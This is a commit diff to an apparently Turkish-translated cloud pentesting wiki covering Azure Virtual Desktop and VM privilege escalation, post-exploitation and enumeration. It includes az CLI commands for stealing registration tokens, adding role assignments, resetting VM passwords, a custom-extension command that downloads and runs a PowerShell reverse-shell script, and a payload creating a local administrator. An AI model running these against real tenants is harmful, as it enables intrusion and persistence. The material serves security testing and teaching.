Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az

This commit is contained in:
Translator
2025-02-26 16:10:00 +00:00
parent 31f6830f4c
commit 115333a177
5 changed files with 133 additions and 63 deletions

View File

@@ -454,7 +454,7 @@
- [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
- [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
- [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
- [Az - CosmosDB](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
- [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
- [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
@@ -465,6 +465,7 @@
- [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
- [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
- [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md)
- [Az - Virtual Desktop Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.md)
- [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
- [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)

View File

@@ -0,0 +1,21 @@
# Az - VMs & Ağ Sonrası İstismar
{{#include ../../../banners/hacktricks-training.md}}
## Sanal Masaüstü
Sanal Masaüstü hakkında daha fazla bilgi için aşağıdaki sayfayı kontrol edin:
{{#ref}}
../az-services/az-virtual-desktop.md
{{#endref}}
### Yaygın teknikler
- **Depolama hesabından bir MSIX paketini üzerine yazmak** herhangi bir VM'de o uygulamayı kullanarak RCE elde etmek için.
- Bir remoteapp'te **çalıştırılacak ikilinin yolunu değiştirmek** mümkündür.
- **Uygulamalardan kaçış** yaparak bir shell'e geçmek ve RCE elde etmek.
- **Azure VMs**'den herhangi bir sonrası istismar saldırısı ve kalıcılık.
- **Özel yapılandırmalar uygulamak için** havuzda çalıştırılacak bir script yapılandırmak mümkündür.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -4,14 +4,24 @@
## Azure Virtual Desktop Privesc
Azure Virtual Desktop hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-virtual-desktop.md
{{#endref}}
### `Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action`
Bir host havuzundaki sanal makineleri kaydetmek için kullanılan kayıt token'ını alabilirsiniz.
```bash
az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
```
### ("Microsoft.Authorization/roleAssignments/read", "Microsoft.Authorization/roleAssignments/write") && ("Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write")
### Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write
Bu izinlerle, sanal masaüstünün sanal makinesine erişmek için gereken Uygulama grubuna bir kullanıcı ataması ekleyebilirsiniz.
> [!WARNING]
> Bu izinlere sahip bir saldırgan, bu olandan çok daha tehlikeli şeyler yapabilir.
Bu izinlerle, sanal masaüstünün sanal makinesine erişmek için gereken Uygulama grubuna bir kullanıcı ataması ekleyebilirsiniz:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
@@ -22,12 +32,6 @@ az rest --method PUT \
}
}'
```
Ayrıca sanal makine kullanıcısını ve şifresini değiştirerek ona erişim sağlayabilirsiniz.
```bash
az vm user update \
--resource-group <RESOURCE_GROUP_NAME> \
--name <VM_NAME> \
--username <USERNAME> \
--password <NEW_PASSWORD>
```
Kullanıcının bir Masaüstüne veya bir uygulamaya erişebilmesi için, ayrıca VM üzerinde `Virtual Machine User Login` veya `Virtual Machine Administrator Login` rolüne de sahip olması gerektiğini unutmayın.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -13,7 +13,7 @@ Azure Sanal Makineleri ve Ağ hakkında daha fazla bilgi için kontrol edin:
### **`Microsoft.Compute/virtualMachines/extensions/write`**
Bu izin, sanal makinelerde uzantıları çalıştırmaya olanak tanır ve **onlarda rastgele kod çalıştırılmasını** sağlar.\
Örnek, bir VM'de rastgele komutlar çalıştırmak için özel uzantıların kötüye kullanılması:
Bir VM'de rastgele komutlar çalıştırmak için özel uzantıların kötüye kullanılması örneği:
{{#tabs }}
{{#tab name="Linux" }}
@@ -76,7 +76,7 @@ az vm extension set \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
--protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
```
Ayrıca şu şekilde diğer yükleri de çalıştırabilirsiniz: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
Ayrıca şu gibi diğer yükleri de çalıştırabilirsiniz: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
- VMAccess uzantısını kullanarak şifreyi sıfırlama
```bash
@@ -298,13 +298,13 @@ Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
### `Microsoft.Compute/virtualMachines/login/action`
Bu izin, bir kullanıcının **bir VM'ye SSH veya RDP üzerinden kullanıcı olarak giriş yapmasına** olanak tanır (VM'de Entra ID kimlik doğrulaması etkinleştirildiği sürece).
Bu izin, bir kullanıcının **SSH veya RDP aracılığıyla bir VM'ye kullanıcı olarak giriş yapmasına** olanak tanır (VM'de Entra ID kimlik doğrulaması etkinleştirildiği sürece).
**SSH** ile giriş yapmak için **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** ve **RDP** ile giriş yapmak için **normal Azure kimlik bilgilerinizi** kullanın.
### `Microsoft.Compute/virtualMachines/loginAsAdmin/action`
Bu izin, bir kullanıcının **bir VM'ye SSH veya RDP üzerinden kullanıcı olarak giriş yapmasına** olanak tanır (VM'de Entra ID kimlik doğrulaması etkinleştirildiği sürece).
Bu izin, bir kullanıcının **SSH veya RDP aracılığıyla bir VM'ye kullanıcı olarak giriş yapmasına** olanak tanır (VM'de Entra ID kimlik doğrulaması etkinleştirildiği sürece).
**SSH** ile giriş yapmak için **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** ve **RDP** ile giriş yapmak için **normal Azure kimlik bilgilerinizi** kullanın.
@@ -349,8 +349,18 @@ O zaman saldırganın **VM'yi bir şekilde ele geçirmiş olması gerekir** ve a
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm
{{#endref}}
### "Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write"
Bu izinler, sanal makine kullanıcısını ve şifresini değiştirerek ona erişim sağlamaya olanak tanır:
```bash
az vm user update \
--resource-group <RESOURCE_GROUP_NAME> \
--name <VM_NAME> \
--username <USERNAME> \
--password <NEW_PASSWORD>
```
### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
[**belgelere**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute) göre, bu izin, kaynağınızın işletim sistemini Windows Admin Center aracılığıyla yönetici olarak yönetmenizi sağlar. Bu, VM'leri kontrol etmek için WAC'ye erişim sağlıyormuş gibi görünüyor...
[**Belgeler**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute) göre, bu izin, kaynaklarınızın işletim sistemini Windows Admin Center üzerinden bir yönetici olarak yönetmenizi sağlar. Bu nedenle, bu izin WAC'ye VMs'leri kontrol etme erişimi veriyor gibi görünüyor...
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -4,61 +4,102 @@
## Azure Virtual Desktop
Virtual Desktop, **masaüstü ve uygulama sanallaştırma hizmeti**dir. Kullanıcılara, Windows 11, Windows 10 veya Windows Server dahil olmak üzere tam Windows masaüstlerini, bireysel masaüstler veya bireysel uygulamalar aracılığıyla uzaktan sunma imkanı sağlar. Kişisel kullanım için tek oturumlu kurulumları ve çoklu oturum ortamlarını destekler. Kullanıcılar, yerel uygulamalar veya bir web tarayıcısı kullanarak neredeyse herhangi bir cihazdan bağlanabilirler.
Virtual Desktop, **masaüstü ve uygulama sanallaştırma hizmeti**dir. Kullanıcılara, Windows 11, Windows 10 veya Windows Server dahil olmak üzere tam Windows masaüstlerini, bireysel masaüstler veya bireysel uygulamalar aracılığıyla uzaktan sunma imkanı sağlar. Kişisel kullanım için tek oturumlu kurulumları ve çoklu oturum ortamlarını destekler. Kullanıcılar, yerel uygulamalar veya bir web tarayıcısı kullanarak neredeyse her cihazdan bağlanabilirler.
### Host Pools
Azure Virtual Desktop'taki host havuzları, sanal masaüstleri ve uygulamaları kullanıcılara sağlayan oturum ana bilgisayarı olarak yapılandırılmış Azure sanal makinelerinin koleksiyonlarıdır. İki ana tür vardır:
- **Kişisel host havuzları**, her sanal makinenin tek bir kullanıcıya tahsis edildiği, kendi ortamlarıyla
- **Paylaşımlı host havuzları**, birden fazla kullanıcının mevcut oturum ana bilgisayarındaki kaynakları paylaştığı. Yapılandırılabilir bir oturum limiti vardır ve bir oturum ana bilgisayarı yapılandırması, Azure Virtual Desktop'ın yapılandırmaya dayalı olarak oturum ana bilgisayarlarının oluşturulmasını otomatikleştirmesine olanak tanır.
Azure Virtual Desktop'taki host havuzları, kullanıcılar için sanal masaüstleri ve uygulamalar sağlayan oturum ana bilgisayarı olarak yapılandırılmış Azure sanal makinelerinin koleksiyonlarıdır. İki ana tür vardır:
Her host havuzunun, bir host havuzundaki sanal makineleri kaydetmek için kullanılan bir **kayıt token'ı** vardır.
- **Kişisel host havuzları**, her sanal makinenin tek bir kullanıcıya tahsis edildiği yerlerdir.
- **Yönetici belirli kullanıcıları** VM'lere atayacak şekilde yapılandırılabilir veya bunun **otomatik olarak** yapılması sağlanabilir.
- Bu, yoğun iş yüküne sahip kişiler için idealdir çünkü her kişi kendi VM'sine sahip olacaktır. Ayrıca, dosyaları depolayabilir ve OS diskinde ayarları yapılandırabilirler ve bunlar **her kullanıcının kendi VM'si (host)** olduğu için kalıcı olacaktır.
### Uygulama grupları & Workspace
Uygulama grupları, **kullanıcı erişimini** ya tam bir masaüstüne ya da bir host havuzundaki oturum ana bilgisayarlarında mevcut belirli uygulama setlerine kontrol eder. İki tür vardır:
- **Masaüstü uygulama grupları**, kullanıcılara tam bir Windows masaüstüne erişim sağlar (hem kişisel hem de paylaşımlı host havuzlarıyla mevcut)
- **RemoteApp grupları**, kullanıcılara bireysel yayımlanmış uygulamalara erişim sağlar (yalnızca paylaşımlı host havuzlarıyla mevcut).
Bir host havuzunda bir Masaüstü uygulama grubu olabilir, ancak birden fazla RemoteApp grubu olabilir. Kullanıcılar, farklı host havuzları arasında birden fazla uygulama grubuna atanabilir. Bir kullanıcı, aynı host havuzunda hem masaüstü hem de RemoteApp gruplarına atanmışsa, yalnızca yöneticiler tarafından belirlenen tercih edilen grup türünden kaynakları görür.
- **Paylaşımlı host havuzları**, birden fazla **kullanıcının mevcut oturum ana bilgisayarlarında kaynakları paylaştığı** yerlerdir.
- Her host için **maksimum kullanıcı sayısı** (oturum) yapılandırılabilir.
- **Kayıt anahtarları** kullanarak **VM'leri manuel olarak eklemek** veya **Azure'ın otomatik olarak** host sayısını ölçeklendirmesine izin vermek mümkündür; ancak kayıt anahtarı kullanarak VM ekleme seçeneği yoktur. Kişisel havuzlar için VM'leri otomatik olarak ölçeklendirmek mümkün değildir.
- Kullanıcı oturumlarında dosyaların kalıcı olması için **FSlogix** kullanmak gereklidir.
Bir **workspace**, kullanıcılara atanan masaüstleri ve uygulama gruplarına erişim sağlayan bir **uygulama grupları koleksiyonu**dur. Her uygulama grubu bir workspace ile bağlantılı olmalı ve yalnızca bir workspace'e ait olabilir.
### Session Hosts
### Ana Özellikler
- **Esnek VM Oluşturma**: Azure sanal makinelerini doğrudan oluşturun veya daha sonra Azure Yerel sanal makineleri ekleyin.
- **Güvenlik Özellikleri**: Gelişmiş VM güvenliği için Trusted Launch'ı (güvenli önyükleme, vTPM, bütünlük izleme) etkinleştirin (bir sanal ağa ihtiyaç vardır). Azure Firewall ile entegre edilebilir ve trafiği Ağ Güvenlik Grupları aracılığıyla kontrol edebilir.
- **Domain Join**: Özelleştirilebilir yapılandırmalarla Active Directory alan katılımını destekler.
- **Tanılama & İzleme**: İzleme için günlükleri ve metrikleri Log Analytics, depolama hesapları veya olay hub'larına akıtmak için Tanılama Ayarlarını etkinleştirin.
- **Özel görüntü şablonları**: Oturum ana bilgisayarları eklerken kullanmak üzere oluşturun ve yönetin. Yaygın özelleştirmeleri veya kendi özel betiklerinizi kolayca ekleyin.
- **Workspace Kaydı**: Kullanıcı erişim yönetimini basitleştirmek için yeni veya mevcut workspacelere varsayılan masaüstü uygulama gruplarını kolayca kaydedin.
Bunlar, **kullanıcıların bağlanacağı VM'lerdir.**
- Otomatik ölçeklendirme seçilmişse, havuz için oluşturulması gereken **hostların özellikleri** ile bir şablon oluşturulacaktır.
- Aksi takdirde, Host havuzunu oluştururken oluşturmak istediğiniz **VM'lerin özelliklerini ve sayısını** belirtmek mümkündür ve Azure bunları sizin için oluşturup ekleyecektir.
**VM'leri yapılandırmak için** ana özellikler şunlardır:
- Yeni VM'lerin **ön ek** adı
- **VM türü**: Bu, "Azure sanal makinesi" (Azure VM'lerini kullanmak için) veya "Azure Yerel sanal makinesi" olarak ayarlanabilir; bu, hostların yerinde veya kenarda dağıtılmasına izin verir.
- Konum, bölgeler, VM güvenlik seçenekleri, görüntü, CPU, bellek, Disk boyutu…
- İnternete açılacak **VNet, güvenlik grubu ve portlar**
- Otomatik olarak **bir AD alanına katılmak için kimlik bilgileri** ayarlamak mümkündür veya Entra ID dizinini kullanabilirsiniz.
- Entra ID kullanılıyorsa, yeni VM'yi **Intune'a otomatik olarak kaydetmek** mümkündür.
- Azure hostları ölçeklendirecekse, bir **yönetici kullanıcı adı ve şifre** ayarlamak gereklidir; bu durumda bir **şifre, kullanıcı adı ile ve başka bir şifre ile yapılandırılmalıdır.**
- Özel yapılandırma için **çalıştırılacak bir betik yapılandırmak** mümkündür.
### Application Groups
**Uygulama grupları**, kullanıcıların bir tam masaüstüne veya bir host havuzundaki oturum ana bilgisayarlarında mevcut olan belirli uygulama setlerine erişimini kontrol eder.
İki tür uygulama grubu vardır:
- **Masaüstü uygulama grupları**, kullanıcılara tam Windows masaüstlerine ve ekli uygulamalara erişim sağlar.
- **RemoteApp grupları**, kullanıcılara bireysel uygulamalara erişim sağlar.
- Bu tür bir uygulama grubunu Kişisel Havuz'a atamak mümkün değildir.
- VM içinde çalıştırılacak ikili dosyanın yolunu belirtmek gereklidir.
Bir Paylaşımlı Havuz, **bir Masaüstü uygulama** grubuna ve **birden fazla RemoteApp grubuna** sahip olabilir ve kullanıcılar farklı host havuzları arasında birden fazla uygulama grubuna atanabilir.
Bir kullanıcıya **erişim verildiğinde**, uygulama grubunda **`Masaüstü Sanallaştırma Kullanıcısı`** rolü verilir.
### Workspaces & Connections
**Workspace**, uygulama gruplarının bir koleksiyonudur.
Atanan masaüstüne veya uygulamalara **bağlanmak** için [https://windows365.microsoft.com/ent#/devices](https://windows365.microsoft.com/ent#/devices) adresinden bağlanmak mümkündür. Ayrıca [https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client](https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client) adresinde açıklanan diğer yöntemler de vardır.
Bir kullanıcı hesabına eriştiğinde, erişim sağladığı her şeyin **workspace'ler tarafından ayrılmış olarak sunulacağını** görecektir. Bu nedenle, tanımlı erişimlerin görünür olması için **her uygulama grubunu bir workspace'e eklemek** gereklidir.
Bir kullanıcının bir Masaüstüne veya bir uygulamaya erişebilmesi için, ayrıca VM üzerinde **`Sanal Makine Kullanıcı Girişi`** veya **`Sanal Makine Yöneticisi Girişi`** rolüne sahip olması gerekmektedir.
### Managed Identities
Host havuzlarına yönetilen kimlikler atamak mümkün değildir, bu nedenle bir havuz içindeki oluşturulan VM'ler bunlara sahip olmayacaktır. Ancak, **VM'lere sistem ve kullanıcı yönetilen kimlikleri atamak** ve ardından token'lara metadata'dan erişmek mümkündür. Aslında, web üzerinden host havuzları başlatıldıktan sonra, oluşturulan 2 VM'nin sistem atanan yönetilen kimliği etkinleştirilmiştir (ancak herhangi bir izin yoktur).
### Enumeration
```bash
az extension add --name desktopvirtualization
# List HostPool of a Resource group
az desktopvirtualization hostpool list --resource-group <Resource_Group>
# List HostPools
az desktopvirtualization hostpool list
# List Workspaces
az desktopvirtualization workspace list
# List Application Groups
az desktopvirtualization applicationgroup list --resource-group <Resource_Group>
# List Application Groups By Subscription
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.DesktopVirtualization/applicationGroups?api-version=2024-04-03"
az desktopvirtualization applicationgroup list
# List Applications in a Application Group
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/applications?api-version=2024-04-03"
# Check if Desktops are enabled
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops?api-version=2024-04-03"
# List Assigned Users to the Application Group
az rest \
--method GET \
--url "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01" \
| jq '.value[] | select((.properties.scope | ascii_downcase) == "/subscriptions/<subscription_id_in_lowercase>/resourcegroups/<resource_group_name_in_lowercase>/providers/microsoft.desktopvirtualization/applicationgroups/<app_group_name_in_lowercase>")'
# List hosts
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/sessionHosts?api-version=2024-04-03"
# List Workspace in a resource group
az desktopvirtualization workspace list --resource-group <Resource_Group>
# List Workspace in a subscription
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.DesktopVirtualization/workspaces?api-version=2024-04-03"
# List App Attach Package By Resource Group
# List App Attach packages
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/appAttachPackages?api-version=2024-04-03"
# List App Attach Package By Subscription
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.DesktopVirtualization/appAttachPackages?api-version=2024-04-03"
# List user sessions
az rest --method GET --url "https://management.azure.com/ssubscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostpools/{hostPoolName}/sessionhosts/{hostPoolHostName}/userSessions?api-version=2024-04-03"
# List Desktops
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops?api-version=2024-04-03"
@@ -68,34 +109,27 @@ az rest --method GET --url "https://management.azure.com/subscriptions/{subscrip
# List private endpoint connections associated with hostpool.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/privateEndpointConnections?api-version=2024-04-03"
# List private endpoint connections associated By Workspace.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/workspaces/{workspaceName}/privateEndpointConnections?api-version=2024-04-03"
# List the private link resources available for a hostpool.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/privateLinkResources?api-version=2024-04-03"
# List the private link resources available for this workspace.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/workspaces/{workspaceName}/privateLinkResources?api-version=2024-04-03"
# List sessionHosts/virtual machines.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/sessionHosts?api-version=2024-04-03"
# List start menu items in the given application group.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/startMenuItems?api-version=2024-04-03"
# List userSessions.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/sessionHosts/{sessionHostName}/userSessions?api-version=2024-04-03"
# List userSessions By Host Pool
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/userSessions?api-version=2024-04-03"
```
### Bağlantı
Web üzerinden sanal masaüstüne bağlanmak için https://client.wvd.microsoft.com/arm/webclient/ (en yaygın) veya https://client.wvd.microsoft.com/webclient/index.html (klasik) adreslerinden erişebilirsiniz. Burada açıklanan diğer yöntemler de mevcuttur [https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client?tabs=windows](https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client?tabs=windows)
## Privesc
{{#ref}}
../az-privilege-escalation/az-virtual-desktop-privesc.md
{{#endref}}
## Post Exploitation & Persistence
{{#ref}}
../az-post-exploitation/az-virtual-desktop-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}